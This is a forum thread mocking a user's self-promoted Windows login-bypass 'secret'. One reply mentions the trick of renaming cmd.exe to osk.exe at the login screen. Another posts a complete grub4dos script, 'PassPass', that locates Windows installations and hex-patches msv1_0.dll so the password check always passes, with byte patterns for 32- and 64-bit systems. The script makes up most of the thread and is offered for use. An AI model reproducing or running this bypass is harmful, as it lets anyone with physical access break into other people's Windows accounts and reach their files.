based in the screenshot (and nothing else) it seems you rename cmd to osk and than use the on screen keyboard while login. very very old.
Maybe it's indeed a find which is something different, but the whole way you present it is - and I don't want to be rude - awfully ridiculous. The domain, the videos... the 'top secret' presentation... seriously? It's all more about self-portrayal than anything else. I personaly don't like this kind of behavior.
I believe he has come here made the correct amount of post to post links for the purpose of getting hits on his youtube video and website. And it not saying the "bug" doesn't matter but even if they did fix it there are several other methods of getting past the login screen when its passworded.
I know this is going to sound ridiculous... No one has to play this game, but if you want to get my guide you will need to solve the quiz
If i have not mistaken , is it not How to hack Windows 6.0-6.3 [ for NT 8.1 to come , will have to wait for years ] You do not have any pattern for us to follow, for instance take 3 -> 66 -> X -> Y , [ you should provide the X for anyone to take a guess ] The truth is, to solve your puzzle we must first find the question then the answer. and i would like to say the same May the brain be with you!
Meh, this is a website for sharing ideas, not hoarding them and doing shameless self promotion. I don't need your guide, if you want to get past the login, all you need is a 6 kb file and a little grub4dos knowledge Code: !BAT errorcheck off debug off insmod /%grub%/wenv > nul insmod %0 > nul :: Call the subroutine specified as first parameter of the script if "%1"=="findDLL" goto :findDLL if "%1"=="findWinVer" goto :findWinVer if "%1"=="isWinDir" goto :isWinDir if "%1"=="patchUnpatch" goto :patchUnpatch if "%1"=="patchDLL" goto :patchDLL if "%1"=="unPatchDLL" goto :unPatchDLL if "%1"=="help" goto :help set dll = /system32/msv1_0.dll set osDrv = (md)0x2000+1 set patchDrv = (md)0x2300+1 set devDrv = (md)0x2500+1 set dirDrv = (md)0x5800+80 echo -e \x0 > %osDrv%## Initialize mem drive :: Find Windows installations :: Attempt to auto-detect Windows installation if not "%1"=="" goto :forceDetect :: If debug is off, nothing is written to output :: If debug is on, output is too verbose :: So, set debug to normal and turn it off immediately after debug normal find --devices=h > %devDrv% debug off set /a skip = 0 :autoLoop cat --locate=\x0a --number=1 --skip=%skip% %devDrv% || goto :displayMenu set /a length = %?% - %skip% cat --skip=%skip% --length=%length% %devDrv% | set dev = set /a skip = %length% + %skip% + 1 call %0 findDLL %dev% goto :autoLoop :: Force detection of Windows installation :forceDetect /%grub%/wenv for /L %p in (0,1,%1) do for /L %q in (0,1,%2) do exec %0 findDLL %p %q## Iterate over HD partitions :displayMenu if "%os%"=="" echo No Windows installation found!&& pause && goto :EOF## Display Windows installations found echo -e \ntitle Back to Main Menu \nconfigfile /%grub%/menu.lst \nboot >> %osDrv% echo -e \x0 >> %osDrv%## EOF marker for configfile configfile %osDrv% goto :EOF :: ======================= SUBROUTINES ======================= :: Searches for msv1_0.dll, %1 = findDLL, %2 = Disk#, %3 = Partition# :findDLL set dllRoot = %2 if not "%dllRoot:~0,1%"=="(" set dllRoot = (hd%2,%3) /%grub%/wenv dir %dllRoot%/ > %dirDrv% /%grub%/wenv for /f %i in ( %dirDrv% ) do exec %0 isWinDir %i goto :EOF :: Checks if the directory contains Windows installation, %1 = isWinDir, %2 = Directory :isWinDir set dllPath = %dllRoot%/%2%dll% cat --length=0 %dllPath% || goto :EOF## Don't proceed further for non-existent partitions :: Start forming menu items set grubMenu = \ntitle Windows :: Check for Windows version based on size of msv1_0.dll call %0 findWinVer %dllPath% set grubMenu = %grubMenu% %os% at %dllRoot% \ncall %0 patchUnpatch %dllRoot% %2 \npause \nboot echo -e %grubMenu% >> %osDrv%## Write configfile to mem drive goto :EOF :: Find version of Windows installed :: This batch should print the version of :: .dll's tested on 32-bit ONLY :: You must provide a fully qualified path as parameter. :: Example: (hd0,0)/Windows/System32/msv1_0.dll :: or a valid relative path from current ROOT: :: /Windows/System32/msv1_0.dll :findWinVer # String is "FileV" in Unicode set file=%~dpnx2 set string=\x01\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x56\x00 set version= set char= cat --hex --locate=%string% %file% > nul set /a offbase = %?% + 27 set /a counter=1 :loop set /a figure=0 set /a offset=%offbase%+%counter% cat --skip=%offset% --length=1 %file% | set char= :floop if "%char%"=="%figure%" set version=%version%%%char% set /a figure=%figure%+1 if "%figure%"=="10" goto :fnext goto :floop :fnext if "%char%"=="." set version=%version%%%char% set /a counter=%counter%+1 if "%counter%"=="30" goto :next goto :loop :next set majmin=%version:~0,3% set os=(Unknown) if "%majmin%"=="5.0" set os=2000 if "%majmin%"=="5.1" set os=XP if "%majmin%"=="5.2" set os=XP 64-bit or Server 2003 if "%majmin%"=="6.0" set os=Vista or Server 2008 if "%majmin%"=="6.1" set os=7 or Server 2008 R2 if "%majmin%"=="6.2" set os=8 or Server 2012 goto :EOF :: Patch or Unpatch? :patchUnpatch echo -e title Patch \ncall %0 patchDLL %2 %3 \npause \nboot > %patchDrv% echo -e title UnPatch \ncall %0 unPatchDLL %2 %3 \npause \nboot >> %patchDrv% echo -e title Back to OS detection \nconfigfile %osDrv% \npause \nboot >> %patchDrv% echo -e \x0 >> %patchDrv%## EOF marker for configfile configfile %patchDrv% goto :EOF :: Patches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir :patchDLL set dllPath = %2/%3%dll% cat --locate=\x33\xC0\x90 %dllPath% > nul if "%@retval%"=="1" goto :warnUser :: Check for 0x6486 to identify 64-bit PE cat --locate=\x64\x86 %dllPath% > nul if "%@retval%"=="1" goto :64BitPatch cat --hex --locate=\x83\xF8\x10 --replace=\x33\xC0\x90 %dllPath% > nul goto :patchMessage :64BitPatch cat --hex --locate=\x48\x3B\xC6\x0F\x85 --replace=\x33\xC0\x90\x0F\x85 %dllPath% > nul :patchMessage echo DLL patched goto :EOF :warnUser echo This DLL version is not compatible or has been already patched configfile %osDrv% goto :EOF :: Unpatches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir :unPatchDLL set dllPath = %2/%3%dll% :: Check for 0x6486 to identify 64-bit PE cat --locate=\x64\x86 %dllPath% > nul if "%@retval%"=="1" goto :64BitUnpatch cat --hex --locate=\x33\xC0\x90 --replace=\x83\xF8\x10 %dllPath% > nul goto :unpatchMessage :64BitUnpatch cat --hex --locate=\x33\xC0\x90\x0F\x85 --replace=\x48\x3B\xC6\x0F\x85 %dllPath% > nul :unpatchMessage echo DLL unpatched goto :EOF :help echo -e \nPassPass v1.0 - Idea by jaclaz, Coded by Sherlock echo Released under the jaclaz's CAREWARE license echo -e \nUsage: PassPass.g4b <MaxDisk#> <MaxPartition#>\n echo By default, PassPass tries to autodetect Windows installations echo If autodetection fails, provide MaxDisk# and MaxPartition# echo to forcedetect and guide the script manually echo PassPass.g4b script and /%grub%/wenv binary need to be echo present on the root of the boot media.
'supposed to be a game' roflmao, I like your sense of humor. ...as Tito's brains compute very fast you should've excluded him from contesting, lol)